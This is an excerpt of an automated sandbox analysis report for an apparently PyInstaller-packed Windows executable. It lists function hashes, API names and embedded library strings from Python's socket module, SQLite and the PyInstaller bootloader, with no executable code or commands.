• Instruction Fuzzy Hash: AF828DE1E0A682C1FB639B31D4813B92692EF45F88F545635DE8D8B695DF3CE9A1C300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: 00007B593010
• String ID: -journal$immutable$nolock
• API String ID: 2201947777-4201244970
• Opcode ID: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
• Instruction ID: ce75fc9be9f04938f4a923a17eb48d9ab8db264b8cc57d47b338fd143d9714f0
• Opcode Fuzzy Hash: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
• Instruction Fuzzy Hash: 6C32BBE2A2A68286EB268F35D46037926A6FF54F94F084235CE6E477D4DF3CE465C340

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: c9a6c08779169ed6fbac53a333c9f426242b0e566be1c14cde0df1f5ee08c69c
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 69C10133B28A4285EB11EF64C8812AC7772FB99BA8F910639DE1E57794CF38D015CB10
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: 00007B593010
• String ID: database schema is locked: %s$out of memory$statement too long
• API String ID: 2201947777-1046679716
• Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
• Instruction ID: cca1cbd64ca5563cd9fcccbe9bbb653364e342cc630f1588832afc5e7e73e5f0
• Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
• Instruction Fuzzy Hash: 66F18DE2A0A68286EB66CF31D4107BA67AAFB85F98F084177DE4D07795DF7CE5408340
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
• Instruction ID: 0f42d6d80485d7b6fbc43b351bd6952dfa6df33c6b14883ac2b59153edbb9100
• Opcode Fuzzy Hash: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
• Instruction Fuzzy Hash: 996235B2629196C6E72A8E39D4002BD76A4F748785F045532FE9EC37C4EA7CEA46C710
APIs
Memory Dump Source
• Source File: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
• Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
• Instruction ID: 781b2b0039b25904322650a8100a91240965d83e8975d33540ed3278c1c6e251
• Opcode Fuzzy Hash: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
• Instruction Fuzzy Hash: 036248A262A996C6E7168F38D68137D76D0F748385F049531EE9EC37D4EA3CEA45C700
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
• Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmp
• Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: bind
• String ID: bind$socket.bind
• API String ID: 1187836755-187351271
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: 00007B593010
• String ID: :memory:
• API String ID: 2201947777-2920599690
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
                                                                                                                                                                                                                                  • Opcode ID: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                                  • Instruction ID: 33bf675215fd5496f05ce3ff225a58cf6b303d5b671ded3f4e95729b0050f1ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE01AF2A15A45C2D7245B66E0806687364F719FA4F245721DE380B3D0DE28D8E6C740

                                                                                                                                                                                                                                  Control-flow Graph

APIs
  • Part of subcall function 00007FF72C657F90: _fread_nolock.LIBCMT ref: 00007FF72C65803A
• _fread_nolock.LIBCMT ref: 00007FF72C651A1B
  • Part of subcall function 00007FF72C652910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
• Instruction ID: 05d1e98607e00c0932de05aeb01288415088a65e3b3c311ea904c174ccc401cc
• Opcode Fuzzy Hash: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
• Instruction Fuzzy Hash: D981D671A0C68286EB22FB14DC412B9B3A2FFA47A4FE04435DA8D43785DE3CE5458F60

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
• String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
• API String ID: 141981615-2881308447
• Opcode ID: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
• Instruction ID: b05b5a4407e1e0f580f83ba9db571c37406b979269f9d217eeee24e95b1540a4
• Opcode Fuzzy Hash: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
• Instruction Fuzzy Hash: 0DB1D6A2A09A81C2F6228F35D4C42BC7364FB94BA4F145375EE6D036A1DF3CE596C310

Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFreeInfo$getaddrinfo
                                                                                                                                                                                                                                  • String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
                                                                                                                                                                                                                                  • API String ID: 2288433384-1074899869
                                                                                                                                                                                                                                  • Opcode ID: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
                                                                                                                                                                                                                                  • Instruction ID: ae175bb3c18e274c0e1fb70e1b1509865ee23ad9c1701b9869c822e99ff3d8fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABC118B6A0A602C6FB56CF31D4C46BC33A8BB48B94F0445B5EE0D52A64DF3DE526C360

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
• Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmp
• Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
Similarity
• API ID: 00007B593010
• String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
• API String ID: 2201947777-879093740

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: ErrorLast$select
• String ID: timed out
• API String ID: 1043644060-3163636755
                                                                                                                                                                                                                                  • Opcode ID: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                                  • Instruction ID: c960e4cacc89c28e3e3410244b5ad6dc291a67dab191bca81c6b07fba9c511d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7141A4E1E0F642C6FA635F35E4C423D6398AF04B64F2441B4ED4D426A5CF3DE86B8622

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536E1
• GetLastError.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536EB
  • Part of subcall function 00007FF72C652C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
  • Part of subcall function 00007FF72C652C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
  • Part of subcall function 00007FF72C652C50: MessageBoxW.USER32 ref: 00007FF72C652D99
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: a21fb4b08906b3152e570bc7fccf02248fe77c7fd2e6215aee0efc2c8f7c518f
• Instruction Fuzzy Hash: 3C219461F18A4291FA22B720EC153B6A253FFA87B4FE40132D75D865D5EE2CE509CB24

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction ID: 1fb64c4265ef5c98442378a9dd6faad2a8efac5e9508605bdbec03dfb8d90cd3
• Instruction Fuzzy Hash: EDC1162290C687D1E762AB1198402BDBBB2FBE1BA0FE54138DA4D07791CF7CE4459F60
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction ID: 796ce303beb9b4be6c1e9479fbbaca77649ece06acdcfdde21d698eb5fda0e84
• Instruction Fuzzy Hash: D7417421B18A8691EA12FB10EC152E9A313FF643A4FE04132EB5D47695DF3CE519CB60
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: setsockopt
• String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
• API String ID: 3981526788-1608436615
• Opcode ID: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
• Instruction ID: 84c31f9223df03e84e56cdbc0124ca818cf57f0d5108d79f6a196e107dbdb7a0
• Instruction Fuzzy Hash: D6411DB2609A46D2EB218F31E4C06AE7368FB88B94F500172EE9D43764DF3DD55AC750
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                  • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                  • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                  • Instruction ID: 12f2793f87a0cfabd5006127b9dd515ea5c3dd244955dbdb141ed273a02c9acd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
